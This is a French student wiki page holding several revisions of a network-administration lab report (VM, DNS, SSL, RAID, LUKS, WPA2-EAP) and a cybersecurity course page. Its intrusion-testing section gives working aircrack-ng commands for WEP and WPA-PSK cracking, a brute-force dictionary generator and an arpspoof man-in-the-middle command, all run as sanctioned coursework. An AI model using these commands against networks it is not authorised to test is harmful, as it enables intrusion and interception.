Wiki d'activités IMA - Contributions de l’utilisateur [fr]

TP sysres IMA5sc 2020/2021 G3

2021-01-28T18:49:05Z

Tmertz : /* Ferme de serveur */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

== Ferme de serveur ==

Ajout du bridge bridgeStudents sur la VM (fichier .cfg)

commande installation python :
ansible -i clavaire.ini -m raw -a "apt install python -y" all --user root --ask-pass

commande envoi clé ssh :

<nowiki> ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key="{{lookup("file","/root/.ssh/id_rsa.pub")}}"' --user root --ask-pass all</nowiki>

Pour le message du jour, on crée un role "motd" qui va copier notre fichier dans /etc/motd sur notre autre machine. On installe également ntp et on ajoute la ligne pour avoir accès au server ntp.plil.info dans le fichier /etc/ntp.conf

Dockerfile

FROM httpd
COPY ./index.html /usr/local/apache2/htdocs/
CMD [ "httpd", "-D", "FOREGROUND" ]

docker build -t web .

docker run -d web

fichier main.yml

---
- name: "Install docker on host"
hosts: Install_docker
remote_user: root
vars :
"ansible_distribution": "Debian"
"ansible_distribution_release": "buster"
roles:
- role: geerlingguy.docker

- name: "Setup Docker"
hosts: HTTPD
remote_user: root
roles:
- role: HTTPD

il faut maintenant envoyer notre image docker sur notre seconde vm, pour cela on fait un repo docker local
docker run -d -p 5000:5000 --restart always --name repo
et on push notre image
on peut ensuite (en acceptant les communication http : /etc/docker/daemon.json ) pull l'image sur la seconde vm

TP sysres IMA5sc 2020/2021 G3

2021-01-28T18:19:20Z

Tmertz : /* Ferme de serveur */

TP sysres IMA5sc 2020/2021 G3

2021-01-28T17:51:00Z

Tmertz : /* Ferme de serveur */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns1.clavaire.site.
@ IN NS ns6.gandi.net.
@ IN MX 100 clavaire.site.
ns1 IN A 193.48.57.186
www IN A 193.48.57.186
IN AAAA [ipv6]

- relancer bind :
service bind9 restart

- pour vérifier :
host -tany clavaire.site

=== Sécurisation site web par certificat ===

Dans un premier temps, nous avons créé un serveur apache2,

systemctl start apache2

Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443

Ajout du certificat SSL

Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé

La commande est disponible par mail: simoninrichard@gmail.com

Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier

Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.

Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.

mailx -f Maildir/

Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.

A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL

Nous devons ensuite activer nos certificats SSL

a2enmod ssl

Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.

Puis un petit restart et notre site est sécurisé.

=== Sécurisation de serveur DNS par DNSSEC ===

Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.

Nous avons vérifié le bon fonctionnement à l'aide de :

https://dnsviz.net/d/clavaire.site/dnssec/

== Tests d’intrusion ==

=== Cassage de clef WEP d’un point d’accès WiFi ===

Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.

Dans un premier temps nous avons annalysé nos interfaces avec

airmon-ng

Le résultat obtenue est

PHY Interface Driver Chipset
phy0 wlx40a5ef0f6518 rt2800usb Ralink Technology, Corp. RT5370

Nous obtenons ainsi l'interface de la clé WI-PI.
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.

airmon-ng start wlx40a5ef0f6518 3

Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.

aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518

En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès

aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518

Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP

aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap

et nous obtenons notre clé pour la cracotte03

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ]
Decrypted correctly: 100%

=== Exploitation de failles du système ===
=== Cassage de mot de passe WPA-PSK par force brute ===

Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.

Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.

Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.

aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap

Code c pour générer le dictionnaire :

#include <stdio.h>
#include <stdlib.h>

int main(){
FILE *f;
f = fopen("fichierbruteforce.txt","w");
if(f==NULL){
printf("Erreur lors de l'ouverture c'un fichier");
exit(1);
}

for(char a=0; a<10;a++)
{
for(char z=0; z<10;z++)
{
for(char e=0; e<10;e++)
{
for(char r=0; r<10;r++)
{
for(char t=0; t<10;t++)
{
for(char y=0; y<10;y++)
{
for(char u=0; u<10;u++)
{
for(char i=0; i<10;i++)
{
//printf("%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
fprintf(f,"%d%d%d%d%d%d%d%d\n",a,z,e,r,t,y,u,i);
}
}
}
}
}
}
}
}
fclose(f);
return 0;
}

=== Attaque de type "homme au milieu" par usurpation ARP ===

L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.

Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,

sysctl -w net.ipv4.ip_forward=1

Nous commencons ainsi le piratage,

attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186

=== Intrusion sur un serveur d’application Web ===

== Réalisations ==

=== Sécurisation de données ===

On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.
On peut créer le raid :
mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7
mkfs.ext4 /dev/md0

Pour qu'il soit monté a chaque démarrage de la vm :
mdadm --monitor --daemonise /dev/md0

Et on l'ajoute au fichier /etc/fstab

Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.

=== Chiffrement de données ===

Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:

df -h

Nous connaissons ainsi notre Filesystem:

fdisk /dev/sdb

Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.

Puis nous quittons fdisk mais nous devons exécuter la commande

partprobe

Pour re-écrire dans la table de partition.

Nous commençons l'initialisations de notre clé cryptée

sudo cryptsetup luksFormat /dev/sdb1

sudo cryptsetup luksOpen /dev/sdb1 home

Nous pouvons accéder à notre clé depuis

cd /media/pifou/665....62/

Nous avons créé un fichier test en sudo à la racine.

sudo cryptsetup luksClose home

Cette commande permet de fermer notre clé cryptée.

=== Sécurisation WiFi par WPA2-EAP ===

==== Configuration borne wifi ====

wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3
wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3
wifi-ima5sc(config)# aaa group server radius radius_group3
wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813
wifi-ima5sc(config-server)#exit
wifi-ima5sc(config)# dot11 ssid SSID_GROUP3
wifi-ima5sc(config-ssid)# mbssid guest-mode
wifi-ima5sc(config-ssid)# vlan 303
wifi-ima5sc(config-ssid)# authentication open eap eap_group3
wifi-ima5sc(config-ssid)# authentication network-eap eap_group3
wifi-ima5sc(config-ssid)# authentication key-management wpa
wifi-ima5sc(config-ssid)#exit

wifi-ima5sc(config)# int Dot11Radio0
wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip
wifi-ima5sc(config-if)# mbssid
wifi-ima5sc(config-if)#exit
wifi-ima5sc(config)# ssid SSID_GROUP3

wifi-ima5sc(config)# int dot11radio0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit

wifi-ima5sc(config)# int Gi0.3
wifi-ima5sc(config-subif)# encapsulation dot1q 303
wifi-ima5sc(config-subif)# bridge-group 3
wifi-ima5sc(config-subif)#exit
wifi-ima5sc(config)#exit
wifi-ima5sc# write

Nous avons configuré notre routeur wifi à l'aide de notre Vlan.

==== Installation freeRadius ====

Sudo apt install freeradius

dans le fichier
/etc/freeradius/3.0/users

Nous ajoutons une ligne dans le but d'ajouter un utilisateur
pifou Cleartext-Password := "pasglop"

Dans le fichier
/etc/freeradius/3.0/client.conf

Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.

client pra_wifi {
ipaddr = 10.60.100.10
secret = secret_group3 }

Dans le fichier
/etc/freeradius/3.0/mods-enabled/eap

On ajoute la ligne suivante afin de définir le protocole de communication
default_eap_type = peap

Et on peut lancer notre freeradius
freeradius -X

==== DHCP ====
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.

6509E
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

C9200
IMA5sc-R2(config)#ip dhcp pool groupe3
IMA5sc-R2(dhcp-config)#dns 193.48.57.186
IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0
IMA5sc-R2(dhcp-config)#default-router 10.60.103.254
IMA5sc-R2(dhcp-config)#exit
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100
IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255
IMA5sc-R2(config)#exit
IMA5sc-R2#sh ip dhcp binding

== Site Web ==

Achat de clavaire.site[https://www.clavaire.site] sur gandi

Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.

== Ferme de serveur ==

Ajout du bridge bridgeStudents sur la VM (fichier .cfg)

commande installation python :
ansible -i clavaire.ini -m raw -a "apt install python -y" all --user root --ask-pass

commande envoi clé ssh :

<nowiki> ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key="{{lookup("file","/root/.ssh/id_rsa.pub")}}"' --user root --ask-pass all</nowiki>

Pour le message du jour, on crée un role "motd" qui va copier notre fichier dans /etc/motd sur notre autre machine

Dockerfile

FROM httpd
COPY ./index.html /usr/local/apache2/htdocs/
CMD [ "httpd", "-D", "FOREGROUND" ]

docker build -t web .

docker run -d web

fichier main.yml

---
- name: "Install docker on host"
hosts: Install_docker
remote_user: root
vars :
"ansible_distribution": "Debian"
"ansible_distribution_release": "buster"
roles:
- role: geerlingguy.docker

- name: "Setup Docker"
hosts: HTTPD
remote_user: root
roles:
- role: HTTPD

Option Cybersécurité 2020/2021

2021-01-18T07:39:21Z

Tmertz : /* Répartition des binômes */

== Documents ==

Le module de cybersécurité se présente sous la forme d'un certain nombre d'énigmes ou de puzzles à résoudre.

Vous avez ici la liste des supports correspondants :
* Pour tous les participants un [https://ctf.plil.fr/challenges?category=option-cyberscurit-20202021 "jeu du drapeau"] comportant 10 niveaux. Certains niveaux sont difficiles mais pas compliqués et ne demandent donc pas d'expertise particulière en informatique, électronique ou traitement du signal. D'autres niveaux sont clairement compliqués, tentez !
* Pour ceux qui n'en ont pas déjà eu l'occasion, essayez de pénétrer sur le serveur de l'application Web [http://honey.plil.info]. Comme seule indication il vous est indiqué que le mot de passe de l'administrateur suit le même tropisme que celui des machines Zabeth. A vous de tester les attaques habituelles sur les sites Web utilisant des bases de données.
* Attaques réseau : [[Manipulations Web et Mail]]
* Attaques objects connectés : Vous disposez d'un "réseau" d'objets composé d'un Arduino Uno standard et d'un émetteur/récepteur FSK RFM69HCW. Plusieurs programmes transmettant des données peuvent être implantés sur les Arduino. Le but est de rechercher la clé de chiffrement et/ou les données envoyées. Pour cela, vous aurez physiquement accès à l'objet connecté pour pouvoir tenter de dumper la mémoire, lire des bus, ou intercepter le flux de donnée radio.

Les supports de cours sont disponibles à l'adresse [http://www.cyberedu.fr/pages/supports/]

== Répartition des binômes ==

Ecrivez vos noms sous le format exact "Prénom Nom", séparez vos noms par des virgules.

{| class="wikitable"
! Projet !! Elèves
|-
| [[Cyber 2020/2021 G1]] || Loïc RINGOT & Pierre SANCHEZ
|-
| [[Cyber 2020/2021 G2]] || Tanguy VIEUBLED & Paul VERNIER
|-
| [[Cyber 2020/2021 G3]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G4]] || Quentin BARGIBANT & Robin COUBELLE
|-
| [[Cyber 2020/2021 G5]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G6]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G7]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G8]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G9]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G10]] || Thomas MERTZ & Sébastien DARDENNE
|-
| [[Cyber 2020/2021 G11]] || Prénom NOM & Prénom NOM
|-
| [[Cyber 2020/2021 G12]] || Guillaume ROUILLÉ & Evan GURY
|-
|}

TP sysres IMA5sc 2020/2021 G3

2020-12-17T12:11:18Z

Tmertz : /* Ferme de serveur */

TP PRA - SIMONIN/MERTZ - Clavaire

== Informations générales ==

Hostname : Clavaire
IP local : 100.64.0.25/28
IP publique : 193.48.57.186/28
URL : www.clavaire.site

== Installation VirtualMachine ==

Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info

xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster

Lancement de la VM puis connexion :
xl create -c /etc/xen/clavaire.cfg
xen console clavaire

''Pour quitter la VM : CTRL + ]''

On ajoute des disques à notre VM :

Rename disque et formatage (lvrename/mkfs)

Modif .cfg pour ajouter disques

Transfert fichier /var vers nouvelle partition

Ajoute au /etc/fstab les disques

Mount -a

== Routage du site IPv4 ==

Dans VM : /etc/network/interfaces

iface eth0 inet static
address 193.48.57.186
netmask 255.255.255.255
up ip address add dev eth0 100.64.0.26/24
up ip route add default via 100.64.0.2 src 193.48.57.186
down ip address del dev eth0 100.64.0.26/24
down ip route del default via 100.64.0.2 src 193.48.57.186

Dans gateway

1. ssh zabeth09 et zabeth30

2. minicom -> /dev/ttyACM0 et /dev/ttyUSB0

3. enable

4. conf t

5. ip route 193.48.57.186 255.255.255.255 100.64.0.26

6. exit

7. write

Création du Vlan303 :

Routeur 6509-E

vlan 303
name clavaire303
exit
int vlan 303
no shut
ip address 100.64.0.1 255.255.255.0
exit
vlan 303
vrrp 54 ip 10.60.103.254
vrrp 54 preempt
vrrp 54 priority 110

Routeur C9200

vlan 333
name clavaire303
exit
int vlan 333
no shut
ip address 100.64.0.2 255.255.255.0
exit
vlan 303
vrrp 54 address-family ipv4
address 10.60.103.254
preempt
vrrpv2

== Services Internet ==
=== SSH ===
modif /etc/ssh/sshd_config :

Changement port : PORT 2222
Login depuis root : PermitRootLogin yes

service ssh restart

on peut donc :
ssh root@193.48.57.186 -p 2222

=== DNS ===
Ajout DNS :

- le faire dans gandi
- modifier fichier /etc/bind/named.conf.local en ajoutant :
zone "clavaire.site" IN {
type master;
file "/etc/bind/db.clavaire.lan";
};

- puis avoir un ficher db.clavaire.lan :
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA ns1.clavaire.site. admin.clavaire.site. (
8 ; Serial
